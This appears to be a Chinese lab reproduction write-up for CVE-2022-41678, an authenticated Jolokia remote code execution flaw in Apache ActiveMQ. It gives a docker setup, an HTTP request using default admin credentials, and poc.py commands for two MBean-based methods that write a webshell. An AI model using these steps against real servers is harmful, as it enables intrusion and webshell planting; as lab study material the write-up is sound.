Apache ActiveMQ Jolokia 后台远程代码执行漏洞(CVE-2022-41678)
Apache ActiveMQ Jolokia后台远程代码执行漏洞(CVE-2022-41678)
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,他支持Java消息服务、集群、Spring Framework等。
Apache ActiveMQ在5.16.5,5.17.3版本及以前,后台Jolokia存在一处任意文件写入导致的远程代码执行漏洞。
漏洞环境
cd activemq/CVE-2022-41678
docker-compose up -d
服务启动后,访问http://10.10.10.10:8161/后输入账号密码admin和admin,即可成功登录后台。
漏洞复现
首先,访问/api/jolokia/list这个API查看当前服务器里所有的MBeans:
GET /api/jolokia/list HTTP/1.1
Host: 10.10.10.10:8161
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Origin: http://10.10.10.10
这其中有两个被用来执行任意代码。
方法1
第一个方法是使用org.apache.logging.log4j.core.jmx.LoggerContextAdminMBean,这是由Log4j2通过的一个MBean。
攻击者使用这个MBean中的setConfigText操作开源更改Log4j的配置,进而将日志写入任意目录中。
使用POC脚本复现
python poc.py -u admin -p admin http://10.10.10.10:8161
这个方法受到ActiveMQ版本的限制,因为Log4j2是在5.17.0中才引入Apache ActiveMQ。
方法2
第二个可利用的Mbean是jdk.management.jfr.FlightRecorderMXBean。
FlightRecorder是在OpenJDK 11中引入的特性,被用于记录Java虚拟机的运行事件。利用这个功能,攻击者可以将事件日志写入任意文件。
使用poc脚本来复现完整的过程(使用--exploit参数指定使用的方法):
python poc.py -u admin -p admin --exploit jfr http://localhost:8161
Webshell被写入在/admin/shelljfr.jsp文件中:
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?